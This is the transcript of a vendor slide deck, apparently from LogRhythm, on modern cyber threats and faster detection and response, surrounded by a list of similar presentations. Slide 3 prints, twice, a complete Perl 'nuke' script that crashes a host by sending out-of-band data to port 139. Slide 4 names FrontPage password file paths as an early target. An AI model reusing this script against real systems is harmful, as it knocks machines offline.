1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm.

Slides:



Advertisements
Similar presentations
1© Copyright 2011 EMC Corporation. All rights reserved. The Future of the Advance Soc 3rd Annual Privacy, Access and Security Congress, Ottawa, 2012 Mike.
Advertisements

© 2013 Bradford Networks. All rights reserved. Rapid Threat Response From 7 Days to 7 Seconds.
Security Life Cycle for Advanced Threats
Security intelligence: solving the puzzle for actionable insight Fran Howarth Senior analyst, security Bloor Research.
1© Copyright 2014 EMC Corporation. All rights reserved. Securing the Cloud Gintaras Pelenis Field Technologist RSA, the Security Division of EMC
© 2013 AT&T Intellectual Property. All rights reserved. AT&T, the AT&T logo and all other AT&T marks contained herein are trademarks of AT&T Intellectual.
SPEAKER BLITZ ERIC BROWN Senior Systems Engineer NICK JAVANOVIC DoD Regional Sales Manager.
Radware DoS / DDoS Attack Mitigation System Orly Sorokin January 2013.
©2014 Bit9. All Rights Reserved Building a Continuous Response Architecture.
Cyber Security Discussion Craig D’Abreo – VP Security Operations.
© 2012 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written.
Cyber crime on the rise. Recent cyber attacks How it happens? Distributed denial of service Whaling Rootkits Keyloggers Trojan horses Botnets Worms Viruses.
Did You Hear That Alarm? The impacts of hitting the information security snooze button.
Staying Ahead of the Curve in Cyber Security Bill Chang CEO, SingTel Group Enterprise.
Dell Connected Security Solutions Simplify & unify.
Managing Data Against Insider Threats Dr. John D. Johnson, CISSP.
GSHRM Conference Cyber Security Education Shri Cockroft, CISO Piedmont Healthcare, Inc. September 21, 2015.
The Changing World of Endpoint Protection
Nexthink V5 Demo Security – Malicious Anomaly. Situation › Avoid damage resulting from the incident itself and the cost of the unplanned response › Protection.
HP World September 2002 Scott S. Blake, CISSP Vice President, Information Security BindView Corporation Vulnerability Assessment and Action.
Sky Advanced Threat Prevention
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. State of Network Security.
MANAGED SECURITY TESTING PROACTIVELY MANAGING VULNERABILITIES.
Connected Security Your best defense against advanced threats Anne Aarness – Intel Security.
Security: Emerging Threats & Trends Danielle Alvarez, CISO.
By, CA K RAGHU, PAST PRESIDENT – INSTITUTE OF CHARTERED ACCOUNTANTS OF INDIA.
Friday 22nd April 2016 DS Chris Greatorex SEROCU
2© Copyright 2013 EMC Corporation. All rights reserved. Cyber Intelligence Fighting Cyber Crime Insert Event Date LEADERS EDGE.
1 | Company Confidential The Modern Cyber Threat Pandemic Nate Traiser Mtn Region Ent Sales Engineer
How to Make Cyber Threat Intelligence Actionable
Contextual Security Intelligence Suite™ Preventing Data Breaches without Constraining Business.
©2012 Bit9. All Rights Reserved Peter Llorens, PERegional Sales Manager, FL, Caribbean & Latin America Julio GutierrezSales Engineer, FL, Caribbean & Latin.
Why SIEM – Why Security Intelligence??
CLOSE THE SECURITY GAP WITH IT SOLUTIONS FROM COMPUTACENTER AND CISCO AUGUST 2014.
Why IT auditing is a must in your security strategy ?
CURRENT STATUS OF CYBERCRIME  Security is the fastest growing service in IT  Cyber Crime Costs $750 Billion annually  70% of threats arrive via .
Tripwire Threat Intelligence Integrations. 2 Threat Landscape by the Numbers Over 390K malicious programs are found every day AV-Test.org On day 0, only.
Understanding and breaking the cyber kill chain
Proactive Incident Response
Your Partner for Superior Cybersecurity
5 Obstacles to Faster Cyber Threat Detection and Response
Cyber Security Zafar Sadik
Executive Director and Endowed Chair
Comprehensive Security and Compliance at an Affordable Price.
Cyber Security: State of the Nation
The Modern Cyber Threat Pandemic
Introduction to a Security Intelligence Maturity Model
Active Cyber Security, OnDemand
LogRhythm-Threat Lifecycle Management
بهترین راهکار را انتخاب کنید...
Threat Lifecycle Management
Andy Hall – Cyber & Tech INSURANCE Specialist
Securing Your Digital Transformation
THE NEXT GENERATION MSSP
cyberopsalliance.com |
11/17/2018 9:32 PM © Microsoft Corporation. All rights reserved. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN.
Cybersecurity at PJM Jonathon Monken
Shifting from “Incident” to “Continuous” Response
Securing the Threats of Tomorrow, Today.
Panda Adaptive Defense Platform and Services
Anatomy of a Large Scale Attack
Protect Your Ecommerce Site From Hacking and Fraud
Incident response and intrusion detection
Strategic threat assessment
Managing IT Risk in a digital Transformation AGE
Information Protection
Cybersecurity at PJM Jonathon Monken
Security intelligence: solving the puzzle for actionable insight
Information Protection
AIR-T11 What We’ve Learned Building a Cyber Security Operation Center: du Case Study Tamer El Refaey Senior Director, Security Monitoring and Operations.
Presentation transcript:

1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm

2 | Company Confidential When Times Were Simpler

3 | Company Confidential Early Attacks #!/usr/bin/perl # use strict; use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]); if (!$h) { print "A hostname must be provided. Ex: } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S; #!/usr/bin/perl # use strict; use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]); if (!$h) { print "A hostname must be provided. Ex: } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;

4 | Company Confidential Early Attacks \_vti_pvt\ o Administrators.pwd o Authors.pwd

5 | Company Confidential Fast forward to 2015

6 | Company Confidential The Economist, November 2015 “Attackers will still get in…the only safe assumption is that your network is breached, and to make sure that you deal with intruders promptly—not after the 200-odd days which it typically takes. Many networks have no means of detecting a breach at all.”

7 | Company Confidential Attackers Are Getting In of surveyed firms were compromised by a successful cyber-attack in % “There are two kinds of big companies in the United States: those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.” – October 5, 2014 James Comey, Director FBI The CyberEdge Group, 2015 Cyberthreat Defense Report (1) Note 1. Survey includes 624 IT security professionals from North America and Europe representing organizations with more than 500 global employees

8 | Company Confidential The Expanding Cyber Threat Motive PoliticalIdeologicalCriminal

9 | Company Confidential Ever Increasing Cyber Risk Inappropriate Network Use Zero Day Attacks Credit Card Theft Compliance Violations Custom Malware Insider Threats MALWARE Phishing Breach INTRUSION Fraud State Sponsored Attacks Privilege Account Abuse spear phishing Denial of Service Compromised Endpoints BruteForcing Unintended Disclosure Trojan Horses MiTM Attacks Ransomware Payment Card Fraud Social Engineering Data Exfiltration Whaling Hijacking Keyloggers Source: PwC’s The Global State of Information Security Survey MILLION MILLION MILLION MILLION MILLION MILLION 66% Growth in Security Incidents

10 | Company Confidential Damaging Data Breaches

11 | Company Confidential Big Data Analytics can best detect these threats An Excellent Security Intelligence Platform Delivers: Big Data analytics to identify advanced threats Qualified and prioritized detection, reducing noise Incident response workflow orchestration and automation Capabilities to prevent high- impact breaches & damaging cyber incidents However, advanced threats: Require a broader view to recognize Only emerge over time Get lost in the noise Prevention-centric approaches can stop common threats A New Security Approach is Required

Prevention-Centric Approaches Firewalls Intrusion Prevention Systems Anti-Virus/Malware Sandboxing 205 Median number of days that companies were compromised before detection of threat - Mandiant M-Trends Median number of days that companies were compromised before detection of threat - Mandiant M-Trends 2015 Preventable Threats Previously Seen Signature-Based Static One-Dimensional Prevention-Centric Approaches are Insufficient Modern Cyber Threats Advanced Stealthy Persistent Dynamic Multi-Dimensional

13 | Company Confidential Prevention-Centric is Obsolete “Advanced targeted attacks make prevention-centric strategies obsolete. Securing enterprises in 2020 will require a shift to information and people-centric security strategies, combined with pervasive internal monitoring and sharing of security intelligence.” “By 2020, 60% of enterprise information security budgets will be allocated for rapid detection and response approaches up from less than 10% in 2013.” - Neil MacDonald,

14 | Company Confidential Faster Detection & Response Reduces Risk High VulnerabilityLow Vulnerability Months Days Hours Minutes Weeks MTTD & MTTR MEAN-TIME-TO-DETECT (MTTD) The average time it takes to recognize a threat requiring further analysis and response efforts MEAN-TIME-TO-RESPOND (MTTR) The average time it takes to respond and ultimately resolve the incident As organizations improve their ability to quickly detect and respond to threats, the risk of experiencing a damaging breach is greatly reduced Exposed to ThreatsResilient to Threats

15 | Company Confidential Data Exfiltration Can Be Avoided Advanced threats take their time and leverage the holistic attack surface Early neutralization = no damaging cyber incident or data breach Initial Compromise Command & Control Lateral Movement Target Attainment Exfiltration Corruption Disruption Reconnaissance ATTACK

16 | Company Confidential Vigilance Requires Visibility at Every Vector User Network Endpoint Holistic Attack Surface Endpoint User Network User Network User Endpoint User Network User Network Endpoint User Network Endpoint Network Endpoint User Network Endpoint User Network User

17 | Company Confidential Security Intelligence Platform TIME TO DETECT TIME TO RESPOND Recover Cleanup Report Review Adapt Neutralize Implement countermeasures to mitigate threat and associated risk Investigate Analyze threat to determine nature and extent of the incident Threat Lifecycle Management: End-to-End Detection & Response Workflow Qualify Assess threat to determine risk and whether full investigation is necessary Detect & Prioritize User Analytics Machine Analytics Collect & Generate Forensic Sensor Data Security Event Data Example Sources Log & Machine Data Example Sources

18 | Company Confidential Delivering a Path to Success Security Intelligence Maturity Levels Level 0: Blind Level 1: Minimally Complaint Level 2: Securely Compliant Level 3: Vigilant Level 4: Resilient MEAN-TIME-TO-DETECT (MTTD) MEAN-TIME-TO-RESPOND (MTTR) Greater threat resiliency is achieved at higher levels of security intelligence maturity Months Days Hours Minutes Weeks Timeframe Level 0Level 1Level 2Level 3Level 4 Exposed to ThreatsResilient to Threats

19 | Company Confidential Market Leadership Certifications & Validations Industry Awards Company Awards Company of the Year Industry Analysts

20 | Company Confidential THANK YOU